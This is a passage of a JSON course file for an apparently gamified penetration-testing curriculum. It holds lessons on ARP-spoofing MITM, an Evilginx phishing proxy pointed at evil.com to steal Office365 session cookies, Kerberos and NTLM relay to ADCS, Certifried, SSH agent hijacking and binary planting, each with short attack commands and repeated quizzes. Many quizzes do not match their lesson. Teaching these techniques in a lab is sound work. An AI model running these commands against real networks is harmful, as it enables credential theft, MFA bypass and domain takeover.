layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2},{"type":"quiz","q":"netcat is called...","opts":["Network knife","TCP/IP Swiss Army knife","Packet sniffer","Port scanner"],"ans":1},{"type":"quiz","q":"TTL stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type","Transport Tracking"],"ans":1},{"type":"quiz","q":"Default deny blocks...","opts":["Nothing","Everything not explicitly allowed","Everything","Logs only"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration","Managed Traffic"],"ans":1},{"type":"quiz","q":"Wireshark filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk"],"ans":1},{"type":"quiz","q":"Evil twin targets...","opts":["Bluetooth","Wi-Fi (fake AP)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"Port 53 is...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A rogue AP is...","opts":["Secured AP","Fake AP by attacker","Government AP","No-password AP"],"ans":1},{"type":"quiz","q":"What resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"FTP ports are...","opts":["20,21","22,23","80,443","25,110"],"ans":0},{"type":"quiz","q":"NAT translates...","opts":["DNS names","Private IPs to public IPs","Protocols","Encryption"],"ans":1},{"type":"quiz","q":"OSI has how many layers?","opts":["4","5","7","10"],"ans":2},{"type":"quiz","q":"Layer 4 is...","opts":["Physical","Network","Transport","Application"],"ans":2}]},{"id":"na2-bettercap","cat":"Network Attacks","title":"Bettercap Network Attacks","diff":2,"xp":150,"intro":"Modern all-in-one network attack framework.","sections":[{"type":"text","content":"bettercap replaces ettercap with a modular, scriptable architecture."},{"type":"code","lang":"bash","content":"bettercap -iface eth0\n> net.probe on\n> arp.spoof on\n> net.sniff on"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"bettercap is...","opts":["A firewall","A modular network attack framework","An IDS","A VPN"],"ans":1},{"type":"quiz","q":"Layer 4 is...","opts":["Physical","Network","Transport","Application"],"ans":2},{"type":"quiz","q":"UDP is...","opts":["Connection-oriented","Connectionless","Encrypted","Slower than TCP"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2},{"type":"quiz","q":"netcat is called...","opts":["Network knife","TCP/IP Swiss Army knife","Packet sniffer","Port scanner"],"ans":1},{"type":"quiz","q":"TTL stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type","Transport Tracking"],"ans":1},{"type":"quiz","q":"Default deny blocks...","opts":["Nothing","Everything not explicitly allowed","Everything","Logs only"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration","Managed Traffic"],"ans":1},{"type":"quiz","q":"Wireshark filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk"],"ans":1},{"type":"quiz","q":"Evil twin targets...","opts":["Bluetooth","Wi-Fi (fake AP)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"Port 53 is...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A rogue AP is...","opts":["Secured AP","Fake AP by attacker","Government AP","No-password AP"],"ans":1},{"type":"quiz","q":"What resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"FTP ports are...","opts":["20,21","22,23","80,443","25,110"],"ans":0},{"type":"quiz","q":"NAT translates...","opts":["DNS names","Private IPs to public IPs","Protocols","Encryption"],"ans":1}]},{"id":"na2-evilginx","cat":"Network Attacks","title":"Evilginx Phishing Proxy","diff":4,"xp":250,"intro":"Reverse proxy that captures session tokens, bypassing MFA.","sections":[{"type":"text","content":"Evilginx proxies the real login page, captures the session cookie after MFA, and gives the attacker authenticated access."},{"type":"code","lang":"bash","content":"evilginx2\n: phishlets hostname office365 evil.com\n: phishlets enable office365\n: lures create office365"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Evilginx bypasses MFA by...","opts":["Cracking tokens","Capturing the session cookie AFTER MFA completes","Disabling MFA","Brute forcing"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2},{"type":"quiz","q":"netcat is called...","opts":["Network knife","TCP/IP Swiss Army knife","Packet sniffer","Port scanner"],"ans":1},{"type":"quiz","q":"TTL stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type","Transport Tracking"],"ans":1},{"type":"quiz","q":"Default deny blocks...","opts":["Nothing","Everything not explicitly allowed","Everything","Logs only"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration","Managed Traffic"],"ans":1},{"type":"quiz","q":"Wireshark filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk"],"ans":1},{"type":"quiz","q":"Evil twin targets...","opts":["Bluetooth","Wi-Fi (fake AP)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"Port 53 is...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A rogue AP is...","opts":["Secured AP","Fake AP by attacker","Government AP","No-password AP"],"ans":1},{"type":"quiz","q":"What resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"FTP ports are...","opts":["20,21","22,23","80,443","25,110"],"ans":0},{"type":"quiz","q":"NAT translates...","opts":["DNS names","Private IPs to public IPs","Protocols","Encryption"],"ans":1},{"type":"quiz","q":"OSI has how many layers?","opts":["4","5","7","10"],"ans":2},{"type":"quiz","q":"Layer 4 is...","opts":["Physical","Network","Transport","Application"],"ans":2}]},{"id":"na2-coredns","cat":"Network Attacks","title":"CoreDNS Exploitation","diff":3,"xp":200,"intro":"Exploit misconfigured CoreDNS in Kubernetes clusters.","sections":[{"type":"text","content":"CoreDNS in K8s can leak internal service names and be abused for DNS tunneling."},{"type":"code","lang":"bash","content":"# Query CoreDNS for all services\ndig @coredns-ip any kubernetes.default.svc.cluster.local\n# Enumerate services\ndig @coredns-ip srv *.*.svc.cluster.local"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"CoreDNS in K8s can leak...","opts":["Nothing","Internal service names and cluster topology","Passwords","Container images"],"ans":1},{"type":"quiz","q":"certutil downloads files because...","opts":["It's an exploit","It's a legitimate LOLBin","It's a web server","It's a compiler"],"ans":1},{"type":"quiz","q":"NTDS.dit contains...","opts":["Web pages","All domain user password hashes","Network configs","Log files"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["Web server","A domain controller","Email server","DNS"],"ans":1},{"type":"quiz","q":"BloodHound finds...","opts":["Vulnerabilities","AD attack paths","Network topology","Malware"],"ans":1},{"type":"quiz","q":"Data exfil over DNS works because...","opts":["DNS is encrypted","DNS is rarely blocked","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from processes","Packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks persist because...","opts":["Memory only","Survive reboots","Encrypted","Use DNS"],"ans":1},{"type":"quiz","q":"SSH key persistence works because...","opts":["Encrypted","Keys bypass password auth permanently","Kernel mod","DNS change"],"ans":1},{"type":"quiz","q":"Cron persistence runs...","opts":["Once","On a schedule (every minute)","Never","On boot only"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver provide...","opts":["Scanning","C2 command and control","Password cracking","Log analysis"],"ans":1},{"type":"quiz","q":"Cleanup after engagement removes...","opts":["Evidence","Tools, accounts, and modifications you created","All files","The OS"],"ans":1},{"type":"quiz","q":"secretsdump extracts...","opts":["Network traffic","Domain password hashes via DCSync","File contents","Registry keys"],"ans":1},{"type":"quiz","q":"Impacket psexec uses...","opts":["SSH","SMB service creation","RDP","HTTP"],"ans":1},{"type":"quiz","q":"Rubeus handles...","opts":["Web testing","Kerberos attacks","Network scanning","Forensics"],"ans":1}]},{"id":"na2-krbrelay","cat":"Network Attacks","title":"Kerberos Relay Attacks","diff":4,"xp":250,"intro":"Relay Kerberos authentication for privilege escalation.","sections":[{"type":"text","content":"KrbRelay relays Kerberos authentication to LDAP for local privesc without needing to crack any hashes."},{"type":"code","lang":"bash","content":"# KrbRelay for local privesc\nKrbRelay.exe -spn ldap/DC.corp.local -clsid {CLASS_ID}\n# Adds current user to local admins\n# No cracking needed"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"KrbRelay avoids cracking by...","opts":["Using encryption","Relaying live Kerberos auth to LDAP","Using default passwords","Brute forcing"],"ans":1},{"type":"quiz","q":"systemd service files control...","opts":["Network","Service startup and behavior","DNS","Firewall"],"ans":1},{"type":"quiz","q":"Writable root scripts give...","opts":["Read access","Code execution as root","Log viewing","Network access"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1},{"type":"quiz","q":"SeImpersonate allows...","opts":["File deletion","Token impersonation (Potato)","Registry editing","Scanning"],"ans":1},{"type":"quiz","q":"Unquoted path exploits...","opts":["Short paths","Spaces without quotes","Disabled services","Encrypted binaries"],"ans":1},{"type":"quiz","q":"PATH hijacking exploits...","opts":["Absolute paths","Relative command names","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SAM stores...","opts":["Network config","Local Windows password hashes","Registry","Event logs"],"ans":1},{"type":"quiz","q":"What checks Windows privesc?","opts":["nmap","WinPEAS/PowerUp","Wireshark","Burp"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anon access","Remote root = server root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"pspy monitors...","opts":["Network","Processes without root","Files","Registry"],"ans":1},{"type":"quiz","q":"chmod +s sets...","opts":["Secret flag","SUID/SGID bit","Share flag","Sticky bit"],"ans":1},{"type":"quiz","q":"Windows SAM is protected by...","opts":["Encryption only","A lock by the running OS","Permissions","Password"],"ans":1},{"type":"quiz","q":"id command shows...","opts":["IP address","UID, GID, and groups","System info","Network interfaces"],"ans":1},{"type":"quiz","q":"What UID is root?","opts":["1","1000","65534","0"],"ans":3},{"type":"quiz","q":"env command shows...","opts":["Network config","Environment variables","File list","Process list"],"ans":1}]},{"id":"na2-certifried","cat":"Network Attacks","title":"Certifried AD Attack","diff":4,"xp":250,"intro":"CVE-2022-26923: machine account to domain admin via certificates.","sections":[{"type":"text","content":"Create a computer account, set its dNSHostName to a DC's hostname, request a certificate, authenticate as the DC."},{"type":"code","lang":"bash","content":"# Create machine account\nimpacket-addcomputer domain/user:pass -computer-name 'EVIL$' -computer-pass P@ss\n# Set dNSHostName to DC hostname\n# Request certificate as the DC\ncertipy req -u 'EVIL$' -p P@ss -ca CA -template Machine"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Certifried exploits...","opts":["Weak passwords","Machine account certificate enrollment with spoofed hostname","Phishing","Brute force"],"ans":1},{"type":"quiz","q":"YARA rules match...","opts":["Network traffic","Pattern signatures in files/memory","DNS queries","Encryption"],"ans":1},{"type":"quiz","q":"Plaso creates a...","opts":["Disk image","Super-timeline of all events","Network capture","Memory dump"],"ans":1},{"type":"quiz","q":"Ransomware IR first action?","opts":["Pay","Disconnect (don't power off)","Reinstall","Call police"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1},{"type":"quiz","q":"USN Journal records...","opts":["Logins","File system changes","Network","Processes"],"ans":1},{"type":"quiz","q":"Evidence integrity uses...","opts":["File size","Cryptographic hash comparison","Visual inspection","Name matching"],"ans":1},{"type":"quiz","q":"Sandboxing means...","opts":["Deleting","Running in isolated environment","Encrypting","Reversing"],"ans":1},{"type":"quiz","q":"Containment prevents...","opts":["Detection","Further damage and spread","Analysis","Recovery"],"ans":1},{"type":"quiz","q":"Volatility analyzes...","opts":["Network","Memory dumps","Disk images","Logs"],"ans":1},{"type":"quiz","q":"Chain of custody proves...","opts":["Guilt","Evidence wasn't tampered with","Investigation done","Hash matched"],"ans":1},{"type":"quiz","q":"Forensic image is...","opts":["Photo","Bit-for-bit disk copy","Screenshot","Memory dump"],"ans":1},{"type":"quiz","q":"dc3dd improves dd by...","opts":["Speed","Automatic hash calculation","Compression","Smaller output"],"ans":1},{"type":"quiz","q":"malfind detects...","opts":["File changes","Injected code in process memory","Network","Registry"],"ans":1},{"type":"quiz","q":"Log correlation combines...","opts":["Users","Multiple log sources for full picture","Cables","Keys"],"ans":1},{"type":"quiz","q":"Event 1102 means...","opts":["Login","Audit log was cleared","Process created","Service started"],"ans":1}]},{"id":"na2-ad-cs-esc8","cat":"Network Attacks","title":"ADCS ESC8: NTLM Relay to ADCS","diff":4,"xp":250,"intro":"Relay NTLM auth to ADCS web enrollment for certificates.","sections":[{"type":"text","content":"Coerce authentication from a DC, relay to ADCS HTTP enrollment, get a DC certificate for DCSync."},{"type":"code","lang":"bash","content":"# Relay to ADCS web enrollment\nimpacket-ntlmrelayx -t http://ADCS/certsrv/certfnsh.asp -smb2support --adcs\n# Coerce DC authentication\npython3 PetitPotam.py relay_ip DC_ip\n# Use cert for DCSync\ncertipy auth -pfx dc.pfx"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"ESC8 chains...","opts":["Password spray","Coerced auth + NTLM relay to ADCS for DC certificate","Port scanning","Social engineering"],"ans":1},{"type":"quiz","q":"Use-after-free exploits...","opts":["Stack frames","Freed memory reallocated with attacker data","Network","Files"],"ans":1},{"type":"quiz","q":"Integer overflow causes...","opts":["Division by zero","Value exceeding type's max wraps around","Null pointer","Memory leak"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1},{"type":"quiz","q":"Fuzzing sends...","opts":["Valid input","Random/mutated input to find crashes","Network packets","Encryption keys"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection","Position Independent Executable","Protocol Interface","Packet Inspection"],"ans":1},{"type":"quiz","q":"ROP gadget ends with...","opts":["jmp","call","nop","ret"],"ans":3},{"type":"quiz","q":"pwntools is for...","opts":["Web scraping","Binary exploitation","Machine learning","Database"],"ans":1},{"type":"quiz","q":"GDB is for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Expert","Centralized Evaluator"],"ans":0},{"type":"quiz","q":"Web shell provides...","opts":["DDoS","Persistent command execution via HTTP","Email access","DNS control"],"ans":1},{"type":"quiz","q":"Bind shell listens on...","opts":["Attacker's machine","Target machine","Relay server","Random port"],"ans":1},{"type":"quiz","q":"msfvenom generates...","opts":["Wordlists","Metasploit payloads","Network maps","Encryption keys"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Code execution on stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"Shellcode must be...","opts":["Compiled","Position-independent","Encrypted","Signed"],"ans":1},{"type":"quiz","q":"Format string %n does...","opts":["Prints number","Writes to memory","Prints newline","Prints nothing"],"ans":1}]},{"id":"pe2-ssh-agent","cat":"Privilege Escalation","title":"SSH Agent Hijacking","diff":3,"xp":200,"intro":"Steal SSH identities from a running ssh-agent.","sections":[{"type":"text","content":"If SSH_AUTH_SOCK is set, connect to the agent and use its keys."},{"type":"code","lang":"bash","content":"# Find agent sockets\nfind /tmp -name 'agent.*' 2>/dev/null\nSSH_AUTH_SOCK=/tmp/ssh-xxx/agent.xxx ssh user@other-host"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"SSH agent hijacking allows...","opts":["Key theft","Using another user's SSH keys without knowing them","Password reset","Kernel access"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1},{"type":"quiz","q":"SeImpersonate allows...","opts":["File deletion","Token impersonation (Potato)","Registry editing","Scanning"],"ans":1},{"type":"quiz","q":"Unquoted path exploits...","opts":["Short paths","Spaces without quotes","Disabled services","Encrypted binaries"],"ans":1},{"type":"quiz","q":"PATH hijacking exploits...","opts":["Absolute paths","Relative command names","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SAM stores...","opts":["Network config","Local Windows password hashes","Registry","Event logs"],"ans":1},{"type":"quiz","q":"What checks Windows privesc?","opts":["nmap","WinPEAS/PowerUp","Wireshark","Burp"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anon access","Remote root = server root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"pspy monitors...","opts":["Network","Processes without root","Files","Registry"],"ans":1},{"type":"quiz","q":"chmod +s sets...","opts":["Secret flag","SUID/SGID bit","Share flag","Sticky bit"],"ans":1},{"type":"quiz","q":"Windows SAM is protected by...","opts":["Encryption only","A lock by the running OS","Permissions","Password"],"ans":1},{"type":"quiz","q":"id command shows...","opts":["IP address","UID, GID, and groups","System info","Network interfaces"],"ans":1},{"type":"quiz","q":"What UID is root?","opts":["1","1000","65534","0"],"ans":3},{"type":"quiz","q":"env command shows...","opts":["Network config","Environment variables","File list","Process list"],"ans":1},{"type":"quiz","q":"Backup files are dangerous because...","opts":["Encrypted","Contain same sensitive data as original","Always empty","Read-only"],"ans":1},{"type":"quiz","q":"systemd service files control...","opts":["Network","Service startup and behavior","DNS","Firewall"],"ans":1}]},{"id":"pe2-binary-planting","cat":"Privilege Escalation","title":"Binary Planting (DLL/SO)","diff":3,"xp":200,"intro":"Place a malicious binary where a privileged program will load it.","sections":[{"type":"text","content":"If a privileged program searches CWD or relative paths first, plant your binary there."},{"type":"code","lang":"bash","content":"# Linux: writable LD_LIBRARY_PATH entry\n# Windows: DLL in application directory\n# Python: module in CWD (sys.path[0] = '')\necho 'import os;os.system(\"/bin/bash\")' > module.py"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Binary planting exploits...","opts":["Buffer overflows","Library/module search order with writable paths","Network protocols","Encryption"],"ans":1},{"type":"quiz","q":"certutil downloads files because...","opts":["It's an exploit","It's a legitimate LOLBin","It's a web server","It's a compiler"],"ans":1},{"type":"quiz","q":"NTDS.dit contains...","opts":["Web pages","All domain user password hashes","Network configs","Log files"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via 